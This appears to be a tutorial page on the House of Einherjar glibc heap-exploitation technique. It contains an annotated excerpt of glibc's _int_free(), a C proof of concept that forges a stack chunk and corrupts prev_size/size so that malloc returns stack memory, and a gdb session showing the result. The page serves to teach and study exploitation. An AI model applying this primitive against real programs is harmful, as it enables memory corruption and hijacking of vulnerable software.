_int_free() first checks whether the chunk passed in is one that belongs in a fastbin.
If the chunk is not a fastbin chunk, it then checks whether the chunk was obtained via mmap().
_int_free() checks whether the PREV_INUSE flag is set in the chunk's "size" field.
/* Excerpt from glibc _int_free(): the path taken for a chunk that is
   neither a fastbin chunk nor mmapped.  The enclosing function, the
   `if` that this `else if` belongs to, the `errout:` label and the
   assignment of `size` (computed from p's header earlier in
   _int_free, not shown) are all outside this excerpt.  Every
   `errstr`/`goto errout` below is a heap-integrity check that aborts
   the free. */

/* Consolidate other non-mmapped chunks as they arrive. */

else if (!chunk_is_mmapped(p)) {
  if (! have_lock) {
    __libc_lock_lock (av->mutex);
    locked = 1;
  }

  /* Address of the chunk physically following p, derived from p's own
     size field. */
  nextchunk = chunk_at_offset(p, size);

  /* Lightweight tests: check whether the block is already the
     top block.  */
  if (__glibc_unlikely (p == av->top))
    {
      errstr = "double free or corruption (top)";
      goto errout;
    }
  /* Or whether the next chunk is beyond the boundaries of the arena.
     Only applied to contiguous arenas. */
  if (__builtin_expect (contiguous (av)
                        && (char *) nextchunk
                        >= ((char *) av->top + chunksize(av->top)), 0))
    {
      errstr = "double free or corruption (out)";
      goto errout;
    }
  /* Or whether the block is actually not marked used.  p's in-use bit
     is the PREV_INUSE bit of the following chunk's size field.  */
  if (__glibc_unlikely (!prev_inuse(nextchunk)))
    {
      errstr = "double free or corruption (!prev)";
      goto errout;
    }

  /* The following chunk's size must be plausible: larger than a bare
     header and below the arena's total system memory. */
  nextsize = chunksize(nextchunk);
  if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
      || __builtin_expect (nextsize >= av->system_mem, 0))
    {
      errstr = "free(): invalid next size (normal)";
      goto errout;
    }

  free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);

  /* consolidate backward */
  /* NOTE(review): prevsize is read from p's own header and used,
     unchecked, to move p backwards.  Nothing in this excerpt verifies
     that the chunk found at p - prevsize carries a size field equal to
     prevsize; later glibc releases add a "corrupted size vs. prev_size"
     check at this point.  The only validation of the merged chunk is
     whatever unlink() performs (macro, not shown; presumably its
     fd/bk back-link check). */
  if (!prev_inuse(p)) {
    prevsize = prev_size (p);
    size += prevsize;
    p = chunk_at_offset(p, -((long) prevsize));
    unlink(av, p, bck, fwd);
  }

  if (nextchunk != av->top) {
    /* get and clear inuse bit */
    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

    /* consolidate forward */
    if (!nextinuse) {
      unlink(av, nextchunk, bck, fwd);
      size += nextsize;
    } else
      clear_inuse_bit_at_offset(nextchunk, 0);

    /*
      Place the chunk in unsorted chunk list. Chunks are
      not placed into regular bins until after they have
      been given one chance to be used in malloc.
    */

    bck = unsorted_chunks(av);
    fwd = bck->fd;
    /* Integrity check on the unsorted-bin head before linking p in. */
    if (__glibc_unlikely (fwd->bk != bck))
      {
        errstr = "free(): corrupted unsorted chunks";
        goto errout;
      }
    p->fd = fwd;
    p->bk = bck;
    if (!in_smallbin_range(size))
      {
        p->fd_nextsize = NULL;
        p->bk_nextsize = NULL;
      }
    bck->fd = p;
    fwd->bk = p;

    set_head(p, size | PREV_INUSE);
    set_foot(p, size);

    check_free_chunk(av, p);
  }

  /*
    If the chunk borders the current high end of memory,
    consolidate into top
  */

  /* No unsorted-bin check on this path: p (possibly moved backwards
     above) simply becomes the new top chunk with the combined size. */
  else {
    size += nextsize;
    set_head(p, size | PREV_INUSE);
    av->top = p;
    check_chunk(av, p);
  }
Write a fake free chunk on the stack and allocate two memory blocks whose sizes do not fall into the fastbin range.
/* House of Einherjar demonstration program, as given on this page.
   A fake chunk header is built in the stack array fake_chunk, the
   prev_size/size fields of buf2's real chunk are overwritten so that
   _int_free()'s backward-consolidation path walks back onto the fake
   chunk, and the next non-fastbin malloc() is then served from the
   stack.  The gdb session on this page also prints buf1 and buf2, so
   the disassembled binary was built from a slightly longer listing
   than this one. */
#include <stdio.h>
#include <malloc.h>
#include <unistd.h>

int main()
{
    /* Laid out like a malloc chunk: [0] prev_size, [1] size,
       [2..5] fd, bk, fd_nextsize, bk_nextsize (the field order used
       in the _int_free excerpt above; presumably what unlink()
       inspects). */
    unsigned long fake_chunk[6];

    fprintf(stderr,"fake_chunk : %p\n", fake_chunk);

    fake_chunk[0] = 0x100;
    /* All four link fields point back at the fake chunk itself. */
    fake_chunk[2] = (unsigned long)fake_chunk;
    fake_chunk[3] = (unsigned long)fake_chunk;
    fake_chunk[4] = (unsigned long)fake_chunk;
    fake_chunk[5] = (unsigned long)fake_chunk;

    /* Two allocations outside the fastbin range; buf1 is otherwise
       unused here, and neither malloc() result is checked for NULL. */
    unsigned long *buf1 = malloc(0x70);
    unsigned long *buf2 = malloc(0xf0);

    /* buf2 - 2 is buf2's chunk header (prev_size), buf2 - 1 its size
       field.  prev_size becomes the distance from the fake chunk to
       that header, and the size is rewritten as 0x100 with the
       PREV_INUSE bit clear, so free() consolidates backwards by
       prev_size and lands on fake_chunk.  The same distance is stored
       in the fake chunk's own size slot. */
    fake_chunk[1] = (char*)(buf2 - 2) - (char*)fake_chunk;
    *(buf2 - 2) = (char*)(buf2 - 2) - (char*)fake_chunk;
    *(buf2 - 1) = 0x100;

    /* After this call main_arena.top is fake_chunk (see the gdb output
       on this page). */
    free(buf2);

    /* Served from the new "top" on the stack: buf4 == fake_chunk + 0x10
       in the gdb session.  read()'s return value is not checked. */
    char *buf4 = malloc(0x200);
    read(STDIN_FILENO,buf4, 0x200);
}
lazenca= 0x0@ubuntu:~$ gdb -q ./house_of_einherjar Reading symbols from ./house_of_einherjar...(no debugging symbols found)...= done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x00000000004006a6 <+0>:=09push rbp 0x00000000004006a7 <+1>:=09mov rbp,rsp 0x00000000004006aa <+4>:=09sub rsp,0x60 0x00000000004006ae <+8>:=09mov rax,QWORD PTR fs:0x28 0x00000000004006b7 <+17>:=09mov QWORD PTR [rbp-0x8],rax 0x00000000004006bb <+21>:=09xor eax,eax 0x00000000004006bd <+23>:=09mov rax,QWORD PTR [rip+0x20099c] = # 0x601060 <stderr@@GLIBC_2.2.5> 0x00000000004006c4 <+30>:=09lea rdx,[rbp-0x40] 0x00000000004006c8 <+34>:=09mov esi,0x400874 0x00000000004006cd <+39>:=09mov rdi,rax 0x00000000004006d0 <+42>:=09mov eax,0x0 0x00000000004006d5 <+47>:=09call 0x400580 <fprintf@plt> 0x00000000004006da <+52>:=09mov QWORD PTR [rbp-0x40],0x100 0x00000000004006e2 <+60>:=09lea rax,[rbp-0x40] 0x00000000004006e6 <+64>:=09mov QWORD PTR [rbp-0x30],rax 0x00000000004006ea <+68>:=09lea rax,[rbp-0x40] 0x00000000004006ee <+72>:=09mov QWORD PTR [rbp-0x28],rax 0x00000000004006f2 <+76>:=09lea rax,[rbp-0x40] 0x00000000004006f6 <+80>:=09mov QWORD PTR [rbp-0x20],rax 0x00000000004006fa <+84>:=09lea rax,[rbp-0x40] 0x00000000004006fe <+88>:=09mov QWORD PTR [rbp-0x18],rax 0x0000000000400702 <+92>:=09mov edi,0x70 0x0000000000400707 <+97>:=09call 0x400590 <malloc@plt> 0x000000000040070c <+102>:=09mov QWORD PTR [rbp-0x58],rax 0x0000000000400710 <+106>:=09mov edi,0xf0 0x0000000000400715 <+111>:=09call 0x400590 <malloc@plt> 0x000000000040071a <+116>:=09mov QWORD PTR [rbp-0x50],rax 0x000000000040071e <+120>:=09mov rax,QWORD PTR [rip+0x20093b] = # 0x601060 <stderr@@GLIBC_2.2.5> 0x0000000000400725 <+127>:=09mov rdx,QWORD PTR [rbp-0x58] 0x0000000000400729 <+131>:=09mov esi,0x400885 0x000000000040072e <+136>:=09mov rdi,rax 0x0000000000400731 <+139>:=09mov eax,0x0 0x0000000000400736 <+144>:=09call 0x400580 <fprintf@plt> 0x000000000040073b <+149>:=09mov rax,QWORD PTR [rip+0x20091e] = # 0x601060 
<stderr@@GLIBC_2.2.5> 0x0000000000400742 <+156>:=09mov rdx,QWORD PTR [rbp-0x50] 0x0000000000400746 <+160>:=09mov esi,0x400890 0x000000000040074b <+165>:=09mov rdi,rax 0x000000000040074e <+168>:=09mov eax,0x0 0x0000000000400753 <+173>:=09call 0x400580 <fprintf@plt> 0x0000000000400758 <+178>:=09mov rax,QWORD PTR [rbp-0x50] 0x000000000040075c <+182>:=09sub rax,0x10 0x0000000000400760 <+186>:=09mov rdx,rax 0x0000000000400763 <+189>:=09lea rax,[rbp-0x40] 0x0000000000400767 <+193>:=09sub rdx,rax 0x000000000040076a <+196>:=09mov rax,rdx 0x000000000040076d <+199>:=09mov QWORD PTR [rbp-0x38],rax 0x0000000000400771 <+203>:=09mov rax,QWORD PTR [rbp-0x50] 0x0000000000400775 <+207>:=09sub rax,0x10 0x0000000000400779 <+211>:=09mov rdx,QWORD PTR [rbp-0x50] 0x000000000040077d <+215>:=09sub rdx,0x10 0x0000000000400781 <+219>:=09mov rcx,rdx 0x0000000000400784 <+222>:=09lea rdx,[rbp-0x40] 0x0000000000400788 <+226>:=09sub rcx,rdx 0x000000000040078b <+229>:=09mov rdx,rcx 0x000000000040078e <+232>:=09mov QWORD PTR [rax],rdx 0x0000000000400791 <+235>:=09mov rax,QWORD PTR [rbp-0x50] 0x0000000000400795 <+239>:=09sub rax,0x8 0x0000000000400799 <+243>:=09mov QWORD PTR [rax],0x100 0x00000000004007a0 <+250>:=09mov rax,QWORD PTR [rbp-0x50] 0x00000000004007a4 <+254>:=09mov rdi,rax 0x00000000004007a7 <+257>:=09call 0x400540 <free@plt> 0x00000000004007ac <+262>:=09mov edi,0x200 0x00000000004007b1 <+267>:=09call 0x400590 <malloc@plt> 0x00000000004007b6 <+272>:=09mov QWORD PTR [rbp-0x48],rax 0x00000000004007ba <+276>:=09mov rax,QWORD PTR [rbp-0x48] 0x00000000004007be <+280>:=09mov edx,0x200 0x00000000004007c3 <+285>:=09mov rsi,rax 0x00000000004007c6 <+288>:=09mov edi,0x0 0x00000000004007cb <+293>:=09call 0x400560 <read@plt> 0x00000000004007d0 <+298>:=09mov eax,0x0 0x00000000004007d5 <+303>:=09mov rsi,QWORD PTR [rbp-0x8] 0x00000000004007d9 <+307>:=09xor rsi,QWORD PTR fs:0x28 0x00000000004007e2 <+316>:=09je 0x4007e9 <main+323> 0x00000000004007e4 <+318>:=09call 0x400550 <__stack_chk_fail@= plt> 
0x00000000004007e9 <+323>:=09leave =20 0x00000000004007ea <+324>:=09ret =20 End of assembler dump. gdb-peda$ b *0x00000000004007a7 Breakpoint 1 at 0x4007a7 gdb-peda$ b *0x00000000004007cb Breakpoint 2 at 0x4007cb gdb-peda$
The PREV_INUSE flag has been cleared in the chunk's "size" field.
The value of prev_size is 0xffff800000603c50, which is the header address (0x602080) of the chunk to be freed minus the address of the fake chunk (0x7fffffffe430).
gdb-ped= a$ r Starting program: /home/lazenca0x0/house_of_einherjar=20 fake_chunk : 0x7fffffffe430 buf1 : 0x602010 buf2 : 0x602090 Breakpoint 1, 0x00000000004007a7 in main () gdb-peda$ x/i $rip =3D> 0x4007a7 <main+257>:=09call 0x400540 <free@plt> gdb-peda$ i r rdi rdi 0x602090=090x602090 gdb-peda$ x/4gx 0x602090 - 0x10 0x602080:=090xffff800000603c50=090x0000000000000100 0x602090:=090x0000000000000000=090x0000000000000000 gdb-peda$ p/x 0x602080 - 0xffff800000603c50 $1 =3D 0x7fffffffe430 gdb-peda$ x/4gx 0x7fffffffe430 0x7fffffffe430:=090x0000000000000100=090xffff800000603c50 0x7fffffffe440:=090x00007fffffffe430=090x00007fffffffe430 gdb-peda$ p main_arena.top=20 $2 =3D (mchunkptr) 0x602180 gdb-peda$ ni 0x00000000004007ac in main () gdb-peda$ p main_arena.top=20 $3 =3D (mchunkptr) 0x7fffffffe430 gdb-peda$ x/4gx 0x7fffffffe430 0x7fffffffe430:=090x0000000000000100=090xffff800000624bd1 0x7fffffffe440:=090x00007fffffffe430=090x00007fffffffe430 gdb-peda$
gdb-ped= a$ ni 0x00000000004007b1 in main () gdb-peda$ x/i $rip =3D> 0x4007b1 <main+267>:=09call 0x400590 <malloc@plt> gdb-peda$ ni 0x00000000004007b6 in main () gdb-peda$ i r rax rax 0x7fffffffe440=090x7fffffffe440 gdb-peda$ x/4gx 0x7fffffffe440 0x7fffffffe440:=090x00007fffffffe430=090x00007fffffffe430 0x7fffffffe450:=090x00007fffffffe430=090x00007fffffffe430 gdb-peda$ c Continuing. Breakpoint 2, 0x00000000004007cb in main () gdb-peda$ x/i $rip =3D> 0x4007cb <main+293>:=09call 0x400560 <read@plt> gdb-peda$ i r rsi rsi 0x7fffffffe440=090x7fffffffe440 gdb-peda$ ni AAAAAAAAAAAAAAAA 0x00000000004007d0 in main () gdb-peda$ x/4gx 0x7fffffffe440 0x7fffffffe440:=090x4141414141414141=090x4141414141414141 0x7fffffffe450:=090x00007fffffffe40a=090x00007fffffffe430 gdb-peda$